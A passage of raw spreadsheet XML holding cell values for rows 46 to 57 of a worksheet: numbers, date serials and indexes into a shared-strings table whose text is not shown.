        <v>0</v>
      </c>
      <c r="X46">
        <v>600</v>
      </c>
      <c r="Y46">
        <v>0</v>
      </c>
      <c r="Z46">
        <v>0</v>
      </c>
      <c r="AA46">
        <v>7000</v>
      </c>
      <c r="AB46">
        <v>0</v>
      </c>
      <c r="AC46">
        <v>0</v>
      </c>
      <c r="AD46">
        <v>5082</v>
      </c>
      <c r="AE46">
        <v>200000</v>
      </c>
      <c r="AF46" t="s">
        <v>470</v>
      </c>
      <c r="AG46">
        <v>20371</v>
      </c>
      <c r="AH46">
        <v>2</v>
      </c>
      <c r="AJ46">
        <v>35</v>
      </c>
      <c r="AK46" t="s">
        <v>471</v>
      </c>
      <c r="AL46" t="s">
        <v>472</v>
      </c>
      <c r="AM46" t="s">
        <v>473</v>
      </c>
      <c r="AN46" t="s">
        <v>55</v>
      </c>
      <c r="AO46">
        <v>1997</v>
      </c>
      <c r="AP46" t="s">
        <v>474</v>
      </c>
      <c r="AQ46" t="s">
        <v>475</v>
      </c>
      <c r="AR46" t="s">
        <v>470</v>
      </c>
      <c r="AS46" t="s">
        <v>71</v>
      </c>
      <c r="AT46" t="s">
        <v>58</v>
      </c>
      <c r="AU46">
        <v>24</v>
      </c>
      <c r="AV46">
        <v>1</v>
      </c>
      <c r="AW46">
        <v>0</v>
      </c>
      <c r="AX46">
        <v>50</v>
      </c>
      <c r="AY46">
        <v>110</v>
      </c>
      <c r="AZ46">
        <v>301</v>
      </c>
      <c r="BA46" t="s">
        <v>16759</v>
      </c>
      <c r="BB46" t="s">
        <v>14861</v>
      </c>
      <c r="BC46">
        <v>0</v>
      </c>
      <c r="BD46" t="s">
        <v>10640</v>
      </c>
    </row>
    <row r="47" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A47">
        <v>582</v>
      </c>
      <c r="B47" t="s">
        <v>476</v>
      </c>
      <c r="C47" t="s">
        <v>477</v>
      </c>
      <c r="D47" t="s">
        <v>478</v>
      </c>
      <c r="E47" t="s">
        <v>479</v>
      </c>
      <c r="F47" t="s">
        <v>480</v>
      </c>
      <c r="G47" s="1">
        <v>43959</v>
      </c>
      <c r="H47">
        <v>1362</v>
      </c>
      <c r="I47">
        <v>1362</v>
      </c>
      <c r="J47">
        <v>0</v>
      </c>
      <c r="K47">
        <v>0</v>
      </c>
      <c r="L47">
        <v>0</v>
      </c>
      <c r="M47">
        <v>0</v>
      </c>
      <c r="N47">
        <v>0</v>
      </c>
      <c r="O47">
        <v>0</v>
      </c>
      <c r="P47">
        <v>0</v>
      </c>
      <c r="Q47">
        <v>0</v>
      </c>
      <c r="R47">
        <v>0</v>
      </c>
      <c r="S47">
        <v>0</v>
      </c>
      <c r="T47">
        <v>1</v>
      </c>
      <c r="U47">
        <v>0</v>
      </c>
      <c r="V47">
        <v>0</v>
      </c>
      <c r="W47">
        <v>0</v>
      </c>
      <c r="X47">
        <v>0</v>
      </c>
      <c r="Y47">
        <v>0</v>
      </c>
      <c r="Z47">
        <v>0</v>
      </c>
      <c r="AA47">
        <v>0</v>
      </c>
      <c r="AB47">
        <v>0</v>
      </c>
      <c r="AC47">
        <v>0</v>
      </c>
      <c r="AD47">
        <v>0</v>
      </c>
      <c r="AE47">
        <v>10000</v>
      </c>
      <c r="AF47" t="s">
        <v>481</v>
      </c>
      <c r="AG47">
        <v>95231</v>
      </c>
      <c r="AH47">
        <v>29</v>
      </c>
      <c r="AJ47">
        <v>382</v>
      </c>
      <c r="AK47" t="s">
        <v>482</v>
      </c>
      <c r="AL47" t="s">
        <v>483</v>
      </c>
      <c r="AM47" t="s">
        <v>484</v>
      </c>
      <c r="AN47" t="s">
        <v>55</v>
      </c>
      <c r="AO47">
        <v>1997</v>
      </c>
      <c r="AP47">
        <v>811432614</v>
      </c>
      <c r="AQ47" t="s">
        <v>485</v>
      </c>
      <c r="AR47" t="s">
        <v>481</v>
      </c>
      <c r="AU47">
        <v>26</v>
      </c>
      <c r="AV47">
        <v>1</v>
      </c>
      <c r="AW47">
        <v>0</v>
      </c>
      <c r="AX47">
        <v>0</v>
      </c>
      <c r="AY47">
        <v>15</v>
      </c>
      <c r="AZ47">
        <v>1</v>
      </c>
      <c r="BA47" t="s">
        <v>17212</v>
      </c>
      <c r="BB47" t="s">
        <v>14693</v>
      </c>
      <c r="BC47" t="s">
        <v>10334</v>
      </c>
      <c r="BD47" t="s">
        <v>9810</v>
      </c>
    </row>
    <row r="48" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A48">
        <v>235</v>
      </c>
      <c r="B48" t="s">
        <v>486</v>
      </c>
      <c r="C48" t="s">
        <v>157</v>
      </c>
      <c r="D48" t="s">
        <v>487</v>
      </c>
      <c r="E48" t="s">
        <v>101</v>
      </c>
      <c r="F48" t="s">
        <v>488</v>
      </c>
      <c r="G48" s="1">
        <v>43885</v>
      </c>
      <c r="H48">
        <v>1398</v>
      </c>
      <c r="I48">
        <v>1398</v>
      </c>
      <c r="J48">
        <v>2</v>
      </c>
      <c r="K48">
        <v>1</v>
      </c>
      <c r="L48">
        <v>3</v>
      </c>
      <c r="M48">
        <v>0</v>
      </c>
      <c r="N48">
        <v>4000</v>
      </c>
      <c r="O48">
        <v>0</v>
      </c>
      <c r="P48">
        <v>0</v>
      </c>
      <c r="Q48">
        <v>6</v>
      </c>
      <c r="R48">
        <v>10</v>
      </c>
      <c r="S48">
        <v>0</v>
      </c>
      <c r="T48">
        <v>1</v>
      </c>
      <c r="U48">
        <v>600000</v>
      </c>
      <c r="V48">
        <v>50000</v>
      </c>
      <c r="W48">
        <v>18000</v>
      </c>
      <c r="X48">
        <v>0</v>
      </c>
      <c r="Y48">
        <v>0</v>
      </c>
      <c r="Z48">
        <v>0</v>
      </c>
      <c r="AA48">
        <v>0</v>
      </c>
      <c r="AB48">
        <v>15000</v>
      </c>
      <c r="AC48">
        <v>15000</v>
      </c>
      <c r="AD48">
        <v>0</v>
      </c>
      <c r="AE48">
        <v>20000</v>
      </c>
      <c r="AF48" t="s">
        <v>489</v>
      </c>
      <c r="AG48">
        <v>61254</v>
      </c>
      <c r="AH48">
        <v>16</v>
      </c>
      <c r="AJ48">
        <v>242</v>
      </c>
      <c r="AK48" t="s">
        <v>490</v>
      </c>
      <c r="AL48" t="s">
        <v>490</v>
      </c>
      <c r="AM48" t="s">
        <v>491</v>
      </c>
      <c r="AN48" t="s">
        <v>55</v>
      </c>
      <c r="AO48">
        <v>2008</v>
      </c>
      <c r="AP48">
        <v>318544452</v>
      </c>
      <c r="AQ48" t="s">
        <v>492</v>
      </c>
      <c r="AR48" t="s">
        <v>493</v>
      </c>
      <c r="AU48">
        <v>6</v>
      </c>
      <c r="AV48">
        <v>1</v>
      </c>
      <c r="AW48">
        <v>116</v>
      </c>
      <c r="AX48">
        <v>307</v>
      </c>
      <c r="AY48">
        <v>13</v>
      </c>
      <c r="AZ48">
        <v>4</v>
      </c>
      <c r="BA48" t="s">
        <v>16645</v>
      </c>
      <c r="BB48" t="s">
        <v>14409</v>
      </c>
      <c r="BC48" t="s">
        <v>9746</v>
      </c>
      <c r="BD48" t="s">
        <v>10635</v>
      </c>
    </row>
    <row r="49" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A49">
        <v>634</v>
      </c>
      <c r="B49" t="s">
        <v>494</v>
      </c>
      <c r="C49" t="s">
        <v>47</v>
      </c>
      <c r="D49" t="s">
        <v>495</v>
      </c>
      <c r="E49" t="s">
        <v>142</v>
      </c>
      <c r="F49" t="s">
        <v>496</v>
      </c>
      <c r="G49" s="1">
        <v>43914</v>
      </c>
      <c r="H49">
        <v>1419</v>
      </c>
      <c r="I49">
        <v>1419</v>
      </c>
      <c r="J49">
        <v>1</v>
      </c>
      <c r="K49">
        <v>0</v>
      </c>
      <c r="L49">
        <v>0</v>
      </c>
      <c r="M49">
        <v>5</v>
      </c>
      <c r="N49">
        <v>0</v>
      </c>
      <c r="O49">
        <v>0</v>
      </c>
      <c r="P49">
        <v>0</v>
      </c>
      <c r="Q49">
        <v>0</v>
      </c>
      <c r="R49">
        <v>0</v>
      </c>
      <c r="S49">
        <v>0</v>
      </c>
      <c r="T49">
        <v>0</v>
      </c>
      <c r="U49">
        <v>300000</v>
      </c>
      <c r="V49">
        <v>0</v>
      </c>
      <c r="W49">
        <v>0</v>
      </c>
      <c r="X49">
        <v>7500</v>
      </c>
      <c r="Y49">
        <v>0</v>
      </c>
      <c r="Z49">
        <v>0</v>
      </c>
      <c r="AA49">
        <v>0</v>
      </c>
      <c r="AB49">
        <v>0</v>
      </c>
      <c r="AC49">
        <v>0</v>
      </c>
      <c r="AD49">
        <v>0</v>
      </c>
      <c r="AE49">
        <v>0</v>
      </c>
      <c r="AF49" t="s">
        <v>497</v>
      </c>
      <c r="AG49">
        <v>21334</v>
      </c>
      <c r="AH49">
        <v>2</v>
      </c>
      <c r="AJ49">
        <v>50</v>
      </c>
      <c r="AK49" t="s">
        <v>443</v>
      </c>
      <c r="AL49" t="s">
        <v>498</v>
      </c>
      <c r="AM49" t="s">
        <v>499</v>
      </c>
      <c r="AN49" t="s">
        <v>55</v>
      </c>
      <c r="AO49">
        <v>2016</v>
      </c>
      <c r="AP49" t="s">
        <v>500</v>
      </c>
      <c r="AQ49" t="s">
        <v>501</v>
      </c>
      <c r="AR49" t="s">
        <v>497</v>
      </c>
      <c r="AS49" t="s">
        <v>71</v>
      </c>
      <c r="AT49" t="s">
        <v>58</v>
      </c>
      <c r="AU49">
        <v>360</v>
      </c>
      <c r="AV49">
        <v>0</v>
      </c>
      <c r="AW49">
        <v>35</v>
      </c>
      <c r="AX49">
        <v>55</v>
      </c>
      <c r="AY49">
        <v>2</v>
      </c>
      <c r="AZ49">
        <v>0</v>
      </c>
      <c r="BA49" t="s">
        <v>17223</v>
      </c>
      <c r="BB49" t="s">
        <v>14738</v>
      </c>
      <c r="BC49">
        <v>0</v>
      </c>
      <c r="BD49" t="s">
        <v>9553</v>
      </c>
    </row>
    <row r="50" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A50">
        <v>226</v>
      </c>
      <c r="B50" t="s">
        <v>502</v>
      </c>
      <c r="C50" t="s">
        <v>157</v>
      </c>
      <c r="D50" t="s">
        <v>503</v>
      </c>
      <c r="E50" t="s">
        <v>142</v>
      </c>
      <c r="F50" t="s">
        <v>504</v>
      </c>
      <c r="G50" s="1">
        <v>43922</v>
      </c>
      <c r="H50">
        <v>1498</v>
      </c>
      <c r="I50">
        <v>1498</v>
      </c>
      <c r="J50">
        <v>7</v>
      </c>
      <c r="K50">
        <v>0</v>
      </c>
      <c r="L50">
        <v>7</v>
      </c>
      <c r="M50">
        <v>0</v>
      </c>
      <c r="N50">
        <v>1000</v>
      </c>
      <c r="O50">
        <v>0</v>
      </c>
      <c r="P50">
        <v>0</v>
      </c>
      <c r="Q50">
        <v>0</v>
      </c>
      <c r="R50">
        <v>0</v>
      </c>
      <c r="S50">
        <v>0</v>
      </c>
      <c r="T50">
        <v>0</v>
      </c>
      <c r="U50">
        <v>1475000</v>
      </c>
      <c r="V50">
        <v>0</v>
      </c>
      <c r="W50">
        <v>24000</v>
      </c>
      <c r="X50">
        <v>0</v>
      </c>
      <c r="Y50">
        <v>0</v>
      </c>
      <c r="Z50">
        <v>0</v>
      </c>
      <c r="AA50">
        <v>0</v>
      </c>
      <c r="AB50">
        <v>0</v>
      </c>
      <c r="AC50">
        <v>0</v>
      </c>
      <c r="AD50">
        <v>0</v>
      </c>
      <c r="AE50">
        <v>0</v>
      </c>
      <c r="AF50" t="s">
        <v>505</v>
      </c>
      <c r="AG50">
        <v>68451</v>
      </c>
      <c r="AH50">
        <v>16</v>
      </c>
      <c r="AJ50">
        <v>237</v>
      </c>
      <c r="AK50" t="s">
        <v>311</v>
      </c>
      <c r="AL50" t="s">
        <v>506</v>
      </c>
      <c r="AM50" t="s">
        <v>507</v>
      </c>
      <c r="AN50" t="s">
        <v>55</v>
      </c>
      <c r="AO50">
        <v>2009</v>
      </c>
      <c r="AP50">
        <v>333423035</v>
      </c>
      <c r="AQ50" t="s">
        <v>508</v>
      </c>
      <c r="AR50" t="s">
        <v>509</v>
      </c>
      <c r="AS50" t="s">
        <v>71</v>
      </c>
      <c r="AT50" t="s">
        <v>58</v>
      </c>
      <c r="AU50">
        <v>26</v>
      </c>
      <c r="AV50">
        <v>1</v>
      </c>
      <c r="AW50">
        <v>38</v>
      </c>
      <c r="AX50">
        <v>40</v>
      </c>
      <c r="AY50">
        <v>57</v>
      </c>
      <c r="AZ50">
        <v>36</v>
      </c>
      <c r="BA50" t="s">
        <v>17228</v>
      </c>
      <c r="BB50" t="s">
        <v>14401</v>
      </c>
      <c r="BC50" t="s">
        <v>9550</v>
      </c>
      <c r="BD50" t="s">
        <v>10246</v>
      </c>
    </row>
    <row r="51" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A51">
        <v>215</v>
      </c>
      <c r="B51" t="s">
        <v>510</v>
      </c>
      <c r="C51" t="s">
        <v>99</v>
      </c>
      <c r="D51" t="s">
        <v>511</v>
      </c>
      <c r="E51" t="s">
        <v>49</v>
      </c>
      <c r="F51" t="s">
        <v>512</v>
      </c>
      <c r="G51" s="1">
        <v>44053</v>
      </c>
      <c r="H51">
        <v>1538</v>
      </c>
      <c r="I51">
        <v>1538</v>
      </c>
      <c r="J51">
        <v>0</v>
      </c>
      <c r="K51">
        <v>0</v>
      </c>
      <c r="L51">
        <v>0</v>
      </c>
      <c r="M51">
        <v>1</v>
      </c>
      <c r="N51">
        <v>0</v>
      </c>
      <c r="O51">
        <v>0</v>
      </c>
      <c r="P51">
        <v>0</v>
      </c>
      <c r="Q51">
        <v>1</v>
      </c>
      <c r="R51">
        <v>10</v>
      </c>
      <c r="S51">
        <v>0</v>
      </c>
      <c r="T51">
        <v>1</v>
      </c>
      <c r="U51">
        <v>0</v>
      </c>
      <c r="V51">
        <v>0</v>
      </c>
      <c r="W51">
        <v>0</v>
      </c>
      <c r="X51">
        <v>1500</v>
      </c>
      <c r="Y51">
        <v>0</v>
      </c>
      <c r="Z51">
        <v>0</v>
      </c>
      <c r="AA51">
        <v>0</v>
      </c>
      <c r="AB51">
        <v>1000</v>
      </c>
      <c r="AC51">
        <v>50000</v>
      </c>
      <c r="AD51">
        <v>0</v>
      </c>
      <c r="AE51">
        <v>3000</v>
      </c>
      <c r="AF51" t="s">
        <v>513</v>
      </c>
      <c r="AG51">
        <v>11840</v>
      </c>
      <c r="AH51">
        <v>12</v>
      </c>
      <c r="AJ51">
        <v>159</v>
      </c>
      <c r="AK51" t="s">
        <v>303</v>
      </c>
      <c r="AL51" t="s">
        <v>303</v>
      </c>
      <c r="AM51" t="s">
        <v>514</v>
      </c>
      <c r="AN51" t="s">
        <v>55</v>
      </c>
      <c r="AO51">
        <v>2003</v>
      </c>
      <c r="AP51" t="s">
        <v>515</v>
      </c>
      <c r="AQ51" t="s">
        <v>516</v>
      </c>
      <c r="AR51" t="s">
        <v>513</v>
      </c>
      <c r="AS51" t="s">
        <v>57</v>
      </c>
      <c r="AT51" t="s">
        <v>58</v>
      </c>
      <c r="AU51">
        <v>12</v>
      </c>
      <c r="AV51">
        <v>2</v>
      </c>
      <c r="AW51">
        <v>2</v>
      </c>
      <c r="AX51">
        <v>0</v>
      </c>
      <c r="AY51">
        <v>9</v>
      </c>
      <c r="AZ51">
        <v>1</v>
      </c>
      <c r="BA51" t="s">
        <v>17230</v>
      </c>
      <c r="BB51" t="s">
        <v>14391</v>
      </c>
      <c r="BC51" t="s">
        <v>9746</v>
      </c>
      <c r="BD51" t="s">
        <v>9456</v>
      </c>
    </row>
    <row r="52" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A52">
        <v>359</v>
      </c>
      <c r="B52" t="s">
        <v>517</v>
      </c>
      <c r="C52" t="s">
        <v>129</v>
      </c>
      <c r="D52" t="s">
        <v>518</v>
      </c>
      <c r="E52" t="s">
        <v>142</v>
      </c>
      <c r="F52" t="s">
        <v>519</v>
      </c>
      <c r="G52" s="1">
        <v>43900</v>
      </c>
      <c r="H52">
        <v>1588</v>
      </c>
      <c r="I52">
        <v>1588</v>
      </c>
      <c r="J52">
        <v>0</v>
      </c>
      <c r="K52">
        <v>1</v>
      </c>
      <c r="L52">
        <v>0</v>
      </c>
      <c r="M52">
        <v>0</v>
      </c>
      <c r="N52">
        <v>0</v>
      </c>
      <c r="O52">
        <v>0</v>
      </c>
      <c r="P52">
        <v>0</v>
      </c>
      <c r="Q52">
        <v>0</v>
      </c>
      <c r="R52">
        <v>0</v>
      </c>
      <c r="S52">
        <v>0</v>
      </c>
      <c r="T52">
        <v>0</v>
      </c>
      <c r="U52">
        <v>0</v>
      </c>
      <c r="V52">
        <v>350000</v>
      </c>
      <c r="W52">
        <v>0</v>
      </c>
      <c r="X52">
        <v>0</v>
      </c>
      <c r="Y52">
        <v>0</v>
      </c>
      <c r="Z52">
        <v>0</v>
      </c>
      <c r="AA52">
        <v>0</v>
      </c>
      <c r="AB52">
        <v>0</v>
      </c>
      <c r="AC52">
        <v>0</v>
      </c>
      <c r="AD52">
        <v>0</v>
      </c>
      <c r="AE52">
        <v>0</v>
      </c>
      <c r="AF52" t="s">
        <v>520</v>
      </c>
      <c r="AG52">
        <v>15212</v>
      </c>
      <c r="AH52">
        <v>11</v>
      </c>
      <c r="AJ52">
        <v>268</v>
      </c>
      <c r="AK52" t="s">
        <v>252</v>
      </c>
      <c r="AL52" t="s">
        <v>521</v>
      </c>
      <c r="AM52" t="s">
        <v>522</v>
      </c>
      <c r="AN52" t="s">
        <v>55</v>
      </c>
      <c r="AO52">
        <v>2017</v>
      </c>
      <c r="AP52" t="s">
        <v>523</v>
      </c>
      <c r="AQ52" t="s">
        <v>524</v>
      </c>
      <c r="AR52" t="s">
        <v>525</v>
      </c>
      <c r="AS52" t="s">
        <v>179</v>
      </c>
      <c r="AT52" t="s">
        <v>58</v>
      </c>
      <c r="AU52">
        <v>27</v>
      </c>
      <c r="AV52">
        <v>0</v>
      </c>
      <c r="AW52">
        <v>0</v>
      </c>
      <c r="AX52">
        <v>0</v>
      </c>
      <c r="AY52">
        <v>2</v>
      </c>
      <c r="AZ52">
        <v>2</v>
      </c>
      <c r="BA52" t="s">
        <v>16669</v>
      </c>
      <c r="BB52" t="s">
        <v>14509</v>
      </c>
      <c r="BC52" t="s">
        <v>9571</v>
      </c>
      <c r="BD52" t="s">
        <v>9572</v>
      </c>
    </row>
    <row r="53" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A53">
        <v>501</v>
      </c>
      <c r="B53" t="s">
        <v>526</v>
      </c>
      <c r="C53" t="s">
        <v>224</v>
      </c>
      <c r="D53" t="s">
        <v>527</v>
      </c>
      <c r="E53" t="s">
        <v>528</v>
      </c>
      <c r="F53" t="s">
        <v>529</v>
      </c>
      <c r="G53" s="1">
        <v>44140</v>
      </c>
      <c r="H53">
        <v>1612</v>
      </c>
      <c r="I53">
        <v>1612</v>
      </c>
      <c r="J53">
        <v>0</v>
      </c>
      <c r="K53">
        <v>0</v>
      </c>
      <c r="L53">
        <v>0</v>
      </c>
      <c r="M53">
        <v>0</v>
      </c>
      <c r="N53">
        <v>0</v>
      </c>
      <c r="O53">
        <v>0</v>
      </c>
      <c r="P53">
        <v>0</v>
      </c>
      <c r="Q53">
        <v>1</v>
      </c>
      <c r="R53">
        <v>1</v>
      </c>
      <c r="S53">
        <v>0</v>
      </c>
      <c r="T53">
        <v>0</v>
      </c>
      <c r="U53">
        <v>0</v>
      </c>
      <c r="V53">
        <v>0</v>
      </c>
      <c r="W53">
        <v>0</v>
      </c>
      <c r="X53">
        <v>0</v>
      </c>
      <c r="Y53">
        <v>0</v>
      </c>
      <c r="Z53">
        <v>0</v>
      </c>
      <c r="AA53">
        <v>0</v>
      </c>
      <c r="AB53">
        <v>10</v>
      </c>
      <c r="AC53">
        <v>10</v>
      </c>
      <c r="AD53">
        <v>0</v>
      </c>
      <c r="AE53">
        <v>0</v>
      </c>
      <c r="AF53" t="s">
        <v>530</v>
      </c>
      <c r="AG53">
        <v>0</v>
      </c>
      <c r="AH53">
        <v>15</v>
      </c>
      <c r="AJ53">
        <v>225</v>
      </c>
      <c r="AK53" t="s">
        <v>531</v>
      </c>
      <c r="AL53" t="s">
        <v>532</v>
      </c>
      <c r="AM53" t="s">
        <v>533</v>
      </c>
      <c r="AN53" t="s">
        <v>68</v>
      </c>
      <c r="AO53">
        <v>2007</v>
      </c>
      <c r="AP53">
        <v>818461185</v>
      </c>
      <c r="AQ53" t="s">
        <v>534</v>
      </c>
      <c r="AR53" t="s">
        <v>530</v>
      </c>
      <c r="AU53">
        <v>6</v>
      </c>
      <c r="AV53">
        <v>1</v>
      </c>
      <c r="AW53">
        <v>0</v>
      </c>
      <c r="AX53">
        <v>0</v>
      </c>
      <c r="AY53">
        <v>1</v>
      </c>
      <c r="AZ53">
        <v>5</v>
      </c>
      <c r="BA53" t="s">
        <v>17236</v>
      </c>
      <c r="BB53" t="s">
        <v>15883</v>
      </c>
      <c r="BC53" t="s">
        <v>11861</v>
      </c>
      <c r="BD53">
        <v>0</v>
      </c>
    </row>
    <row r="54" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A54">
        <v>373</v>
      </c>
      <c r="B54" t="s">
        <v>535</v>
      </c>
      <c r="C54" t="s">
        <v>157</v>
      </c>
      <c r="D54" t="s">
        <v>536</v>
      </c>
      <c r="E54" t="s">
        <v>142</v>
      </c>
      <c r="F54" t="s">
        <v>537</v>
      </c>
      <c r="G54" s="1">
        <v>43935</v>
      </c>
      <c r="H54">
        <v>1673</v>
      </c>
      <c r="I54">
        <v>1673</v>
      </c>
      <c r="J54">
        <v>5</v>
      </c>
      <c r="K54">
        <v>0</v>
      </c>
      <c r="L54">
        <v>1</v>
      </c>
      <c r="M54">
        <v>2</v>
      </c>
      <c r="N54">
        <v>2500000</v>
      </c>
      <c r="O54">
        <v>0</v>
      </c>
      <c r="P54">
        <v>0</v>
      </c>
      <c r="Q54">
        <v>0</v>
      </c>
      <c r="R54">
        <v>0</v>
      </c>
      <c r="S54">
        <v>0</v>
      </c>
      <c r="T54">
        <v>1</v>
      </c>
      <c r="U54">
        <v>400000</v>
      </c>
      <c r="V54">
        <v>0</v>
      </c>
      <c r="W54">
        <v>1000</v>
      </c>
      <c r="X54">
        <v>3000</v>
      </c>
      <c r="Y54">
        <v>0</v>
      </c>
      <c r="Z54">
        <v>0</v>
      </c>
      <c r="AA54">
        <v>0</v>
      </c>
      <c r="AB54">
        <v>0</v>
      </c>
      <c r="AC54">
        <v>0</v>
      </c>
      <c r="AD54">
        <v>0</v>
      </c>
      <c r="AE54">
        <v>100000</v>
      </c>
      <c r="AF54" t="s">
        <v>538</v>
      </c>
      <c r="AG54">
        <v>67154</v>
      </c>
      <c r="AH54">
        <v>16</v>
      </c>
      <c r="AJ54">
        <v>241</v>
      </c>
      <c r="AK54" t="s">
        <v>539</v>
      </c>
      <c r="AL54" t="s">
        <v>540</v>
      </c>
      <c r="AM54" t="s">
        <v>541</v>
      </c>
      <c r="AN54" t="s">
        <v>82</v>
      </c>
      <c r="AO54">
        <v>2006</v>
      </c>
      <c r="AP54" t="s">
        <v>542</v>
      </c>
      <c r="AQ54" t="s">
        <v>543</v>
      </c>
      <c r="AR54" t="s">
        <v>544</v>
      </c>
      <c r="AS54" t="s">
        <v>71</v>
      </c>
      <c r="AT54" t="s">
        <v>86</v>
      </c>
      <c r="AU54">
        <v>25</v>
      </c>
      <c r="AV54">
        <v>1</v>
      </c>
      <c r="AW54">
        <v>16</v>
      </c>
      <c r="AX54">
        <v>1913</v>
      </c>
      <c r="AY54">
        <v>236</v>
      </c>
      <c r="AZ54">
        <v>139</v>
      </c>
      <c r="BA54" t="s">
        <v>17238</v>
      </c>
      <c r="BB54" t="s">
        <v>14522</v>
      </c>
      <c r="BC54">
        <v>0</v>
      </c>
      <c r="BD54" t="s">
        <v>10283</v>
      </c>
    </row>
    <row r="55" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A55">
        <v>661</v>
      </c>
      <c r="B55" t="s">
        <v>545</v>
      </c>
      <c r="C55" t="s">
        <v>318</v>
      </c>
      <c r="D55" t="s">
        <v>546</v>
      </c>
      <c r="E55" t="s">
        <v>363</v>
      </c>
      <c r="F55" t="s">
        <v>547</v>
      </c>
      <c r="G55" s="1">
        <v>43896</v>
      </c>
      <c r="H55">
        <v>1705</v>
      </c>
      <c r="I55">
        <v>1705</v>
      </c>
      <c r="J55">
        <v>0</v>
      </c>
      <c r="K55">
        <v>0</v>
      </c>
      <c r="L55">
        <v>0</v>
      </c>
      <c r="M55">
        <v>0</v>
      </c>
      <c r="N55">
        <v>0</v>
      </c>
      <c r="O55">
        <v>0</v>
      </c>
      <c r="P55">
        <v>0</v>
      </c>
      <c r="Q55">
        <v>0</v>
      </c>
      <c r="R55">
        <v>0</v>
      </c>
      <c r="S55">
        <v>0</v>
      </c>
      <c r="T55">
        <v>1</v>
      </c>
      <c r="U55">
        <v>0</v>
      </c>
      <c r="V55">
        <v>0</v>
      </c>
      <c r="W55">
        <v>0</v>
      </c>
      <c r="X55">
        <v>0</v>
      </c>
      <c r="Y55">
        <v>0</v>
      </c>
      <c r="Z55">
        <v>0</v>
      </c>
      <c r="AA55">
        <v>0</v>
      </c>
      <c r="AB55">
        <v>0</v>
      </c>
      <c r="AC55">
        <v>0</v>
      </c>
      <c r="AD55">
        <v>0</v>
      </c>
      <c r="AE55">
        <v>5000</v>
      </c>
      <c r="AF55" t="s">
        <v>548</v>
      </c>
      <c r="AG55">
        <v>92254</v>
      </c>
      <c r="AH55">
        <v>26</v>
      </c>
      <c r="AJ55">
        <v>403</v>
      </c>
      <c r="AK55" t="s">
        <v>549</v>
      </c>
      <c r="AL55" t="s">
        <v>550</v>
      </c>
      <c r="AM55" t="s">
        <v>551</v>
      </c>
      <c r="AN55" t="s">
        <v>68</v>
      </c>
      <c r="AO55">
        <v>2016</v>
      </c>
      <c r="AP55">
        <v>8114441241</v>
      </c>
      <c r="AQ55" t="s">
        <v>552</v>
      </c>
      <c r="AR55" t="s">
        <v>548</v>
      </c>
      <c r="AS55" t="s">
        <v>553</v>
      </c>
      <c r="AT55" t="s">
        <v>58</v>
      </c>
      <c r="AU55">
        <v>0</v>
      </c>
      <c r="AV55">
        <v>0</v>
      </c>
      <c r="AW55">
        <v>6</v>
      </c>
      <c r="AX55">
        <v>1</v>
      </c>
      <c r="AY55">
        <v>2</v>
      </c>
      <c r="AZ55">
        <v>0</v>
      </c>
      <c r="BA55" t="s">
        <v>17239</v>
      </c>
      <c r="BB55" t="s">
        <v>14758</v>
      </c>
      <c r="BC55" t="s">
        <v>10010</v>
      </c>
      <c r="BD55" t="s">
        <v>10285</v>
      </c>
    </row>
    <row r="56" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A56">
        <v>462</v>
      </c>
      <c r="B56" t="s">
        <v>554</v>
      </c>
      <c r="C56" t="s">
        <v>168</v>
      </c>
      <c r="D56" t="s">
        <v>555</v>
      </c>
      <c r="E56" t="s">
        <v>142</v>
      </c>
      <c r="F56" t="s">
        <v>143</v>
      </c>
      <c r="G56" s="1">
        <v>44053</v>
      </c>
      <c r="H56">
        <v>1761</v>
      </c>
      <c r="I56">
        <v>1761</v>
      </c>
      <c r="J56">
        <v>1</v>
      </c>
      <c r="K56">
        <v>1</v>
      </c>
      <c r="L56">
        <v>1</v>
      </c>
      <c r="M56">
        <v>0</v>
      </c>
      <c r="N56">
        <v>0</v>
      </c>
      <c r="O56">
        <v>0</v>
      </c>
      <c r="P56">
        <v>0</v>
      </c>
      <c r="Q56">
        <v>0</v>
      </c>
      <c r="R56">
        <v>0</v>
      </c>
      <c r="S56">
        <v>1</v>
      </c>
      <c r="T56">
        <v>1</v>
      </c>
      <c r="U56">
        <v>20000</v>
      </c>
      <c r="V56">
        <v>20000</v>
      </c>
      <c r="W56">
        <v>200</v>
      </c>
      <c r="X56">
        <v>0</v>
      </c>
      <c r="Y56">
        <v>0</v>
      </c>
      <c r="Z56">
        <v>0</v>
      </c>
      <c r="AA56">
        <v>0</v>
      </c>
      <c r="AB56">
        <v>0</v>
      </c>
      <c r="AC56">
        <v>0</v>
      </c>
      <c r="AD56">
        <v>20</v>
      </c>
      <c r="AE56">
        <v>5000</v>
      </c>
      <c r="AF56" t="s">
        <v>556</v>
      </c>
      <c r="AG56">
        <v>16330</v>
      </c>
      <c r="AH56">
        <v>13</v>
      </c>
      <c r="AJ56">
        <v>161</v>
      </c>
      <c r="AK56" t="s">
        <v>557</v>
      </c>
      <c r="AL56" t="s">
        <v>557</v>
      </c>
      <c r="AM56" t="s">
        <v>558</v>
      </c>
      <c r="AN56" t="s">
        <v>68</v>
      </c>
      <c r="AO56">
        <v>2007</v>
      </c>
      <c r="AP56">
        <v>8129429196</v>
      </c>
      <c r="AQ56" t="s">
        <v>559</v>
      </c>
      <c r="AR56" t="s">
        <v>556</v>
      </c>
      <c r="AS56" t="s">
        <v>71</v>
      </c>
      <c r="AT56" t="s">
        <v>72</v>
      </c>
      <c r="AU56">
        <v>26</v>
      </c>
      <c r="AV56">
        <v>0</v>
      </c>
      <c r="AW56">
        <v>16</v>
      </c>
      <c r="AX56">
        <v>12</v>
      </c>
      <c r="AY56">
        <v>3</v>
      </c>
      <c r="AZ56">
        <v>1</v>
      </c>
      <c r="BA56" t="s">
        <v>17366</v>
      </c>
      <c r="BB56" t="s">
        <v>14594</v>
      </c>
      <c r="BC56" t="s">
        <v>10316</v>
      </c>
      <c r="BD56">
        <v>0</v>
      </c>
    </row>
    <row r="57" spans="1:56" x14ac:dyDescent="0.2">
      <c r="A57">
        <v>442</v>
      </c>
      <c r="B57" t="s">
        <v>560</v>
      </c>
